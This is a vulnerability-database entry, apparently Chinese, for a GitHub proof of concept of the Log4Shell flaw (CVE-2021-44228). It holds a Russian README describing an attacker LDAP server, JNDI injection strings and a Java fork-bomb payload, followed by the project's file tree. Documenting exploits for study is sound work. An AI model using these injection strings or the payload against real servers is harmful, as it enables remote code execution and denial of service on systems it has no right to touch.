漏洞平台

POC详情： 5f55a021d6b791c3e8797cf932b41392ddfd969d

来源

https://github.com/funcid/log4j-exploit-fork-bomb

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

描述

💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228

介绍

# log4j-exploit-with-fork-bomb
💣💥💀 Proof of Concept: пример запуска fork-бомбы на удаленном сервере благодаря уязвимости CVE-2021-44228
 
1. Создаем LDAP сервер атакующего (модуль server), который будет выдавать представления строк и кода (модуль payload)

2. Создаем пример жертвы (модуль victim) и передаем в Log4j строку
   Версия JRE <= 6u211, 7u201, 8u191 и 11.0.1

```bash
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
```
   
3. Приложение-жертва получит от сервера атакующего массив байт и интерпретирует их в подставляемую строку или в выполяемый код (параметр `com.sun.jndi.ldap.object.trustURLCodebase = true`)
   
4. Для примера, исполняемым кодом будет fork-бомба (программа, которая запускает свои копии забивая все процессорное время)

```java
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
```

文件快照


 [4.0K]  /data/pocs/5f55a021d6b791c3e8797cf932b41392ddfd969d
├── [ 265]  build.gradle.kts
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 59K]  gradle-wrapper.jar
│       └── [ 230]  gradle-wrapper.properties
├── [7.9K]  gradlew
├── [2.6K]  gradlew.bat
├── [4.0K]  payload
│   ├── [ 288]  build.gradle.kts
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  me
│                   └── [4.0K]  func
│                       └── [4.0K]  payload
│                           └── [ 261]  Exploit.java
├── [1.4K]  README.md
├── [4.0K]  server
│   ├── [ 191]  build.gradle.kts
│   └── [4.0K]  src
│       └── [4.0K]  main
│           └── [4.0K]  java
│               └── [4.0K]  me
│                   └── [4.0K]  func
│                       └── [4.0K]  exploit
│                           ├── [ 152]  App.java
│                           ├── [4.0K]  behavior
│                           │   ├── [ 695]  Injector.java
│                           │   ├── [ 726]  JarInjector.java
│                           │   └── [ 592]  MessageInjector.java
│                           ├── [1.3K]  Interceptor.java
│                           └── [1.8K]  LdapServer.java
├── [  91]  settings.gradle.kts
└── [4.0K]  victim
    ├── [ 168]  build.gradle.kts
    └── [4.0K]  src
        └── [4.0K]  main
            ├── [4.0K]  java
            │   └── [4.0K]  me
            │       └── [4.0K]  func
            │           └── [4.0K]  victim
            │               └── [ 718]  App.java
            └── [4.0K]  resources
                └── [ 565]  log4j.xml

25 directories, 19 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。